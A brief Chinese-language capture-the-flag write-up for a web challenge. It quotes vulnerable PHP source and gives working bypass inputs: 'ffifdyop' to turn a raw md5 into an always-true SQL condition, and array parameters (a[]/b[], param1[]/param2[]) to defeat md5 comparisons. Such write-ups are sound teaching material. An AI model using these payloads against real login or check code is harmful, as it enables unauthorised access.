进入环境
查看源代码没有hint
爆下目录没发现什么
抓包发现响应头有hint
password与之前的输入框参数对应
这里可以绕过md5函数使其为恒真
即password='xxx'or 数字就行
输入ffifdyop绕过
源代码提示
<!--
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
这里用数组绕过?a[]=1&&b[]=2
<?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
这里也差不多换成post传参
param1[]=1¶m2[]=2